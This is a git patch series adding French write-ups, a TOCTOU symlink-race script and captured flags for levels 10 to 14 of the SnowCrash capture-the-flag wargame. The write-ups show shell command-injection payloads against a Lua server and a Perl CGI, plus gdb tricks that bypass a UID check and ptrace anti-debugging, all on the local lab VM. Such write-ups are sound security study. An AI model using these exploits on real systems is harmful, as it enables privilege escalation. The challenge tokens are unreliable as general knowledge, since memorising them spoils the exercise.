From e5215ef92da25bd7f85bd756af512187cbecab34 Mon Sep 17 00:00:00 2001 From: Raphael Date: Wed, 28 Jan 2026 01:25:08 +0100 Subject: [PATCH 01/12] build(nix): removing my branch flake (working on worktree) --- flake.nix | 66 ------------------------------------------------------- 1 file changed, 66 deletions(-) delete mode 100644 flake.nix diff --git a/flake.nix b/flake.nix deleted file mode 100644 index f3dc569..0000000 --- a/flake.nix +++ /dev/null @@ -1,66 +0,0 @@ -{ - description = "Shell for snowcrash project"; - - inputs.nixpkgs.url = "github:NixOS/nixpkgs/nixos-unstable"; - inputs.flake-utils.url = "github:numtide/flake-utils"; - - outputs = - { - self, - nixpkgs, - flake-utils, - }: - flake-utils.lib.eachDefaultSystem ( - system: - let - pkgs = import nixpkgs { - inherit system; - }; - tmux-setup = pkgs.writeShellScriptBin "tmux-setup" '' - #!/usr/bin/env sh - SESSION="SnowCrash" - DIR=$(git rev-parse --show-toplevel 2>/dev/null || pwd) - if ! tmux has-session -t $SESSION 2>/dev/null; then - tmux new-session -d -s $SESSION -c "$DIR" -n dev - tmux send-keys -t $SESSION:0 'ssh level00@localhost -p 4242' C-m - tmux split-window -h -p 30 -t $SESSION:0 -c "$DIR" - tmux send-keys -t $SESSION:0.1 'exec zsh' C-m - tmux new-window -t $SESSION:1 -n git -c "$DIR" - tmux send-keys -t $SESSION:1 'lazygit' C-m - fi - tmux select-window -t $SESSION:0 - tmux select-pane -t $SESSION:0.0 - tmux attach -t $SESSION - ''; - in - { - devShells.default = pkgs.mkShell { - name = "snowcrash-42"; - buildInputs = - with pkgs; - [ - tmux-setup - john - wireshark-qt - ] - ++ ( - if pkgs.stdenv.isLinux then - [ - strace - ltrace - mtrace - ] - else - [ ] - ); - - shellHook = '' - export AS=nasm - export CC='clang' - export ASM_LSP_CONFIG="$(pwd)/asm-lsp.toml" - printf "\n\033[0;90mASM env loaded for: \033[38;5;220m${system}\033[0m\n" - ''; - }; - } - ); -} From b28e4293f390ca76bc9df0bda6369b5f31e3cf0f Mon Sep 17 00:00:00 2001 From: Raphael Date: Wed, 28 Jan 2026 01:25:15 +0100 Subject: [PATCH 02/12] feat(lvl10/ressources): adding the toctou script --- level10/ressources/toctou.sh | 17 +++++++++++++++++ 1 file changed, 17 insertions(+) create mode 100644 level10/ressources/toctou.sh diff --git a/level10/ressources/toctou.sh b/level10/ressources/toctou.sh new file mode 100644 index 0000000..2127ab8 --- /dev/null +++ b/level10/ressources/toctou.sh @@ -0,0 +1,17 @@ +#!/bin/env bash + +INPUT="/home/user/level10/token" +OUTPUT="/tmp/toctou" +PROGRAM="/home/user/level10/level10" + +touch $OUTPUT + +while true; do $PROGRAM $OUTPUT 127.0.0.1; done & + +while ! test -r $OUTPUT; do + rm -f $OUTPUT + touch $OUTPUT + rm -rf $OUTPUT + ln -s $INPUT $OUTPUT +done + From 6e44233f55d9db9da91b7f78bccd88baf0fd1514 Mon Sep 17 00:00:00 2001 From: Raphael Date: Wed, 28 Jan 2026 01:25:39 +0100 Subject: [PATCH 03/12] docs(lvl10): adding the readme --- level10/README.md | 70 +++++++++++++++++++++++++++++++++++++++++++++++ 1 file changed, 70 insertions(+) create mode 100644 level10/README.md diff --git a/level10/README.md b/level10/README.md new file mode 100644 index 0000000..8a7d2a5 --- /dev/null +++ b/level10/README.md @@ -0,0 +1,70 @@ +Lors de mon arriver sur le level10 je remarque 2 fichier dans mon home + +```bash +ls -l +total 16 +-rwsr-sr-x+ 1 flag10 level10 10817 Mar 5 2016 level10 +-rw------- 1 flag10 flag10 26 Mar 5 2016 token +``` + +level10 est un executable qui prends 2 arguments +```bash +./level10 +./level10 file host + sends file to host if you have access to it +``` + +Bien sur token n'est pas lisible par le programme +```c +ltrace ./level10 ./token +__libc_start_main(0x80486d4, 2, 0xbffff7e4, 0x8048970, 0x80489e0 +printf("%s file host\n\tsends file to ho"..., "./level10"./level10 file host + sends file to host if you have access to it +) = 65 +exit(1 ++++ exited (status 1) +++ +``` + +Je tente de faire un autre fichier /tmp/test et de lancer le programme avec +```bash +echo 'test' > /tmp/test + +level10@SnowCrash:~$ ltrace ./level10 /tmp/test 127.0.0.1 +__libc_start_main(0x80486d4, 3, 0xbffff7d4, 0x8048970, 0x80489e0 +access("/tmp/test", 4) = 0 +printf("Connecting to %s:6969 .. ", "127.0.0.1") = 32 +fflush(0xb7fd1a20Connecting to 127.0.0.1:6969 .. ) = 0 +socket(2, 1, 0) = 3 +inet_addr("127.0.0.1") = 0x0100007f +htons(6969, 1, 0, 0, 0) = 14619 +connect(3, 0xbffff71c, 16, 0, 0) = 0 +write(3, ".*( )*.\n", 8) = 8 +printf("Connected!\nSending file .. "Connected! +) = 27 +fflush(0xb7fd1a20Sending file .. ) = 0 +open("/tmp/test", 0, 010) = 4 +read(4, "test\n", 4096) = 5 +write(3, "test\n", 5) = 5 +puts("wrote file!"wrote file! +) = 12 ++++ exited (status 12) +++ +``` + +Il essaye donc l'envoyer un fichier sur le 6969, effectivement lors de la l'ecoute du port avec netcat +```bash +nc -lv 6969 +Connection from 127.0.0.1 port 6969 [tcp/*] accepted +.*( )*. +test +``` + +Le programme semble s'arreter a access lorsque il n'est pas possible de lire le fichier +Mais access est vulnerable a TOUCTOU (Time-Of-Check to Time-Of-Use) +Je vais donc faire un script en bash pour effectuer l'exploit + +```bash +Connection from 127.0.0.1 port 6969 [tcp/*] accepted +.*( )*. +woupa2yuojeeaaed06riuj63c +``` +au bout de 30s le flag tombe From 7fd59db89b9aa21bbad3bac64146904181116927 Mon Sep 17 00:00:00 2001 From: Raphael Date: Wed, 28 Jan 2026 01:26:59 +0100 Subject: [PATCH 04/12] feat(lvl10): adding the flag --- level10/flag | 1 + 1 file changed, 1 insertion(+) create mode 100644 level10/flag diff --git a/level10/flag b/level10/flag new file mode 100644 index 0000000..c82e302 --- /dev/null +++ b/level10/flag @@ -0,0 +1 @@ +feulo4b72j7edeahuete3no7c From 3e60a1558ddd5d3d6ec42ca6d512c59ca8628271 Mon Sep 17 00:00:00 2001 From: Raphael Date: Wed, 28 Jan 2026 02:49:10 +0100 Subject: [PATCH 05/12] docs(lvl11): adding the readme --- level11/README.md | 68 +++++++++++++++++++++++++++++++++++++++++++++++ 1 file changed, 68 insertions(+) create mode 100644 level11/README.md diff --git a/level11/README.md b/level11/README.md new file mode 100644 index 0000000..454f930 --- /dev/null +++ b/level11/README.md @@ -0,0 +1,68 @@ +Lors de mon arriver sur le level 11 je remarque un fichier lua lisble + +```bash +ls -l +total 4 +-rwsr-sr-x 1 flag11 level11 668 Mar 5 2016 level11.lua +``` + +Je l'ouvre pour regarder le contenue +```lua +#!/usr/bin/env lua +local socket = require("socket") +local server = assert(socket.bind("127.0.0.1", 5151)) + +function hash(pass) + prog = io.popen("echo "..pass.." | sha1sum", "r") + data = prog:read("*all") + prog:close() + + data = string.sub(data, 1, 40) + + return data +end + + +while 1 do + local client = server:accept() + client:send("Password: ") + client:settimeout(60) + local l, err = client:receive() + if not err then + print("trying " .. l) + local h = hash(l) + + if h ~= "f05d1d066fb246efe0c6f7d095f909a7a0cf34a0" then + client:send("Erf nope..\n"); + else + client:send("Gz you dumb*\n") + end + + end + + client:close() +end +``` + +Le hash a ete decode via [CrashStation](https://crackstation.net/) et donne en sha1 NotSoEasy +Ce n'est donc pas la reponse mais il fallait bien tenter + +Lors de la lecture du script nous pouvons voir que le port 5151 est ouvert et donc nous pouvons essayer de le lancer avec un netcat en ecoute de ce dernier + +Lorsqu'il est en ecoute il demande un password +```bash +nc localhost 5151 +Password: +``` + +mais le hash est calculer en effectuant une commande `echo $args | sha1sum` (traduit en shell) +nous pouvons donc executer une commande sur cette derniere mais le resultat ne nous sera pas afficher car pas envoyer au client mais nous pouvons la lancer directement pour rediriger dans un fichier +```bash +nc localhost 5151 +Password: $(getflag > /tmp/level11) +Erf nope... + +cat /tmp/level11 +Check flag.Here is your token : fa6v5ateaw21peobuub8ipe6s +``` + From 1bf9c83d06b8c7a469043e43436b913868861936 Mon Sep 17 00:00:00 2001 From: Raphael Date: Wed, 28 Jan 2026 02:49:14 +0100 Subject: [PATCH 06/12] docs(lvl12): adding the readme --- level12/README.md | 51 +++++++++++++++++++++++++++++++++++++++++++++++ 1 file changed, 51 insertions(+) create mode 100644 level12/README.md diff --git a/level12/README.md b/level12/README.md new file mode 100644 index 0000000..971bb25 --- /dev/null +++ b/level12/README.md @@ -0,0 +1,51 @@ +Lors de mon arriver sur le level12 je remarque un fichier lisible avec un script perl + +```bash +ls -l +total 4 +-rwsr-sr-x+ 1 flag12 level12 464 Mar 5 2016 level12.pl +``` + +Ce sciprt prends 2 entree utilisateur (x, y) et transforme x a l'aide de la commande egrep +```perl +#!/usr/bin/env perl +# localhost:4646 +use CGI qw{param}; +print "Content-type: text/html\n\n"; + +sub t { + $nn = $_[1]; + $xx = $_[0]; + $xx =~ tr/a-z/A-Z/; + $xx =~ s/\s.*//; + @output = `egrep "^$xx" /tmp/xd 2>&1`; + foreach $line (@output) { + ($f, $s) = split(/:/, $line); + if($s =~ $nn) { + return 1; + } + } + return 0; +} + +sub n { + if($_[0] == 1) { + print(".."); + } else { + print("."); + } +} + +n(t(param("x"), param("y"))); + +``` + +L'exploit est donc assez simple il suffit de mettre la commande souhaiter dans un fichier avec un nom en majuscule (a cause du tr) et elle sera executer + +```bash +echo "getflag > /tmp/pass" > /tmp/LEVEL +mv /tmp/level /tmp/LEVEL +curl 'localhost:4646?x=`/*/LEVEL`' +cat /tmp/pass +Check flag.Here is your token : g1qKMiRpXf53AWhDaU7FEkczr +``` From fefcf8fcd1c93f4dc2da62bf8e0f0e1e4f9333c1 Mon Sep 17 00:00:00 2001 From: Raphael Date: Wed, 28 Jan 2026 02:49:20 +0100 Subject: [PATCH 07/12] docs(lvl13): adding the readme --- level13/README.md | 88 +++++++++++++++++++++++++++++++++++++++++++++++ 1 file changed, 88 insertions(+) create mode 100644 level13/README.md diff --git a/level13/README.md b/level13/README.md new file mode 100644 index 0000000..3081b8e --- /dev/null +++ b/level13/README.md @@ -0,0 +1,88 @@ +Lors de l'arriver sur le level13 je remarque le fichier level13 + +```bash +ls -l level13 +-rwsr-sr-x 1 flag13 level13 7303 Aug 30 2015 level13 +``` + +Et je remarque egallement que c'est du C +```c +ltrace ./level13 +__libc_start_main(0x804858c, 1, 0xbffff7f4, 0x80485f0, 0x8048660 +getuid() = 2013 +getuid() = 2013 +printf("UID %d started us but we we expe"..., 2013UID 2013 started us but we we expect 4242 +) = 42 +exit(1 ++++ exited (status 1) +++ + +``` + +en le lancant (plus proprement), il attente l'UID 4242 +```bash +level13@SnowCrash:~$ ./level13 +UID 2013 started us but we we expect 4242 +``` + +Voici le code de la fonction main +```asm +0804858c
: + 804858c: 55 push ebp + 804858d: 89 e5 mov ebp,esp + 804858f: 83 e4 f0 and esp,0xfffffff0 + 8048592: 83 ec 10 sub esp,0x10 + 8048595: e8 e6 fd ff ff call 8048380 + 804859a: 3d 92 10 00 00 cmp eax,0x1092 + 804859f: 74 2a je 80485cb + 80485a1: e8 da fd ff ff call 8048380 + 80485a6: ba c8 86 04 08 mov edx,0x80486c8 + 80485ab: c7 44 24 08 92 10 00 mov DWORD PTR [esp+0x8],0x1092 + 80485b2: 00 + 80485b3: 89 44 24 04 mov DWORD PTR [esp+0x4],eax + 80485b7: 89 14 24 mov DWORD PTR [esp],edx + 80485ba: e8 a1 fd ff ff call 8048360 + 80485bf: c7 04 24 01 00 00 00 mov DWORD PTR [esp],0x1 + 80485c6: e8 d5 fd ff ff call 80483a0 + 80485cb: c7 04 24 ef 86 04 08 mov DWORD PTR [esp],0x80486ef + 80485d2: e8 9d fe ff ff call 8048474 + 80485d7: ba 09 87 04 08 mov edx,0x8048709 + 80485dc: 89 44 24 04 mov DWORD PTR [esp+0x4],eax + 80485e0: 89 14 24 mov DWORD PTR [esp],edx + 80485e3: e8 78 fd ff ff call 8048360 + 80485e8: c9 leave + 80485e9: c3 ret + 80485ea: 90 nop + 80485eb: 90 nop + 80485ec: 90 nop + 80485ed: 90 nop + 80485ee: 90 nop + 80485ef: 90 nop +``` + +Notamment cette ligne (7) qui vas nous interesser +```asm +804859a: cmp eax,0x1092 +``` + +0x1092 = 0d4242 +il suffit de changer la valeur de notre uid lors de la comparaison (a l'aide de gdb) +```asm +(gdb) b main +Breakpoint 1 at 0x804858f +(gdb) b *0x804859a +Breakpoint 2 at 0x804859a +(gdb) r +Starting program: /home/user/level13/level13 + +Breakpoint 1, 0x0804858f in main () +(gdb) s +Single stepping until exit from function main, +which has no line number information. + +Breakpoint 2, 0x0804859a in main () +(gdb) set $eax=0x1092 +(gdb) c +Continuing. +your token is 2A31L79asukciNyi8uppkEuSx +[Inferior 1 (process 2288) exited with code 050] +``` From 5149600cb04c156fc9df2877af38dc75ecef444f Mon Sep 17 00:00:00 2001 From: Raphael Date: Wed, 28 Jan 2026 02:49:33 +0100 Subject: [PATCH 08/12] feat(lvl11): adding the flag --- level11/flag | 1 + 1 file changed, 1 insertion(+) create mode 100644 level11/flag diff --git a/level11/flag b/level11/flag new file mode 100644 index 0000000..54ea557 --- /dev/null +++ b/level11/flag @@ -0,0 +1 @@ +fa6v5ateaw21peobuub8ipe6s From 68b88e24e8a118518b92a4458bfa51ab00b20eb4 Mon Sep 17 00:00:00 2001 From: Raphael Date: Wed, 28 Jan 2026 02:49:37 +0100 Subject: [PATCH 09/12] feat(lvl12): adding the flag --- level12/flag | 1 + 1 file changed, 1 insertion(+) create mode 100644 level12/flag diff --git a/level12/flag b/level12/flag new file mode 100644 index 0000000..29e9492 --- /dev/null +++ b/level12/flag @@ -0,0 +1 @@ +g1qKMiRpXf53AWhDaU7FEkczr From cab46cc0938b8f292c3c21dfe8ec6f8e2e2b9042 Mon Sep 17 00:00:00 2001 From: Raphael Date: Wed, 28 Jan 2026 02:49:41 +0100 Subject: [PATCH 10/12] feat(lvl13): adding the flag --- level13/flag | 1 + 1 file changed, 1 insertion(+) create mode 100644 level13/flag diff --git a/level13/flag b/level13/flag new file mode 100644 index 0000000..58c7d7f --- /dev/null +++ b/level13/flag @@ -0,0 +1 @@ +2A31L79asukciNyi8uppkEuSx From f45c37f00efa4c4dda4fd82a7d42ba99ae0b80ec Mon Sep 17 00:00:00 2001 From: Raphael Date: Wed, 28 Jan 2026 03:33:22 +0100 Subject: [PATCH 11/12] docs(level14): adding the readme --- level14/README.md | 79 +++++++++++++++++++++++++++++++++++++++++++++++ 1 file changed, 79 insertions(+) create mode 100644 level14/README.md diff --git a/level14/README.md b/level14/README.md new file mode 100644 index 0000000..9c98293 --- /dev/null +++ b/level14/README.md @@ -0,0 +1,79 @@ +Le repertoire de level14 est vide et aucun flag restant apparent... il ne reste plus qu'a regarder directement dans getflag :eyes: + +(Pour etre honnete je souhaiter faire ca pour tous les flags mais j'ai ete spoiler que c'etait le dernier niveau) + +En regardant le code ca ressemble a une foret de if else if + +En passant par le main j'obtiens ce message +```asm +(gdb) b main +Breakpoint 1 at 0x804894a +(gdb) r +Starting program: /bin/getflag + +Breakpoint 1, 0x0804894a in main () +(gdb) c +Continuing. +You should not reverse this +[Inferior 1 (process 2506) exited with code 01] +``` + +c'est ptrace qui nous empeche de faire ce que nous souhaitons +```asm + 8048989: e8 b2 fb ff ff call 8048540 + 804898e: 85 c0 test eax,eax +``` + +J'ai donc pu le bypass il suffit d'aller a ptrace puis de mettre eax a 0 (afin qu'il pense que c'est une execution classique) +```asm +gdb /bin/getflag +(gdb) b ptrace +Breakpoint 1 at 0x8048540 +(gdb) r +Starting program: /bin/getflag + +Breakpoint 1, 0xb7f146d0 in ptrace () from /lib/i386-linux-gnu/libc.so.6 +(gdb) n +Single stepping until exit from function ptrace, +which has no line number information. +0x0804898e in main () +(gdb) set $eax=0 +(gdb) n +Single stepping until exit from function main, +which has no line number information. +Check flag.Here is your token : +Nope there is no token here for you sorry. Try again :) +``` + +Voici l'exploit complet avec le changement de la return value de getuid pour 3014 (soit d'apres /etc/passwd l'uid de flag14) +```asm +gdb /bin/getflag +(gdb) b ptrace +Breakpoint 1 at 0x8048540 +(gdb) b getuid +Breakpoint 2 at 0x80484b0 +(gdb) r +Starting program: /bin/getflag + +Breakpoint 1, 0xb7f146d0 in ptrace () from /lib/i386-linux-gnu/libc.so.6 +(gdb) n +Single stepping until exit from function ptrace, +which has no line number information. +0x0804898e in main () +(gdb) set $eax=0 +(gdb) n +Single stepping until exit from function main, +which has no line number information. + +Breakpoint 2, 0xb7ee4cc0 in getuid () from /lib/i386-linux-gnu/libc.so.6 +(gdb) n +Single stepping until exit from function getuid, +which has no line number information. +0x08048b02 in main () +(gdb) set $eax=0xBC6 +(gdb) n +Single stepping until exit from function main, +which has no line number information. +Check flag.Here is your token : 7QiHafiNa3HVozsaXkawuYrTstxbpABHD8CPnHJ + +``` From 2cfe814f51aada0d2d0fc0fb4a4d6198cd6ce965 Mon Sep 17 00:00:00 2001 From: Raphael Date: Wed, 28 Jan 2026 03:33:34 +0100 Subject: [PATCH 12/12] feat(lvl14): adding the flag --- level14/flag | 1 + 1 file changed, 1 insertion(+) create mode 100644 level14/flag diff --git a/level14/flag b/level14/flag new file mode 100644 index 0000000..e8aa4cf --- /dev/null +++ b/level14/flag @@ -0,0 +1 @@ +7QiHafiNa3HVozsaXkawuYrTstxbpABHD8CPnHJ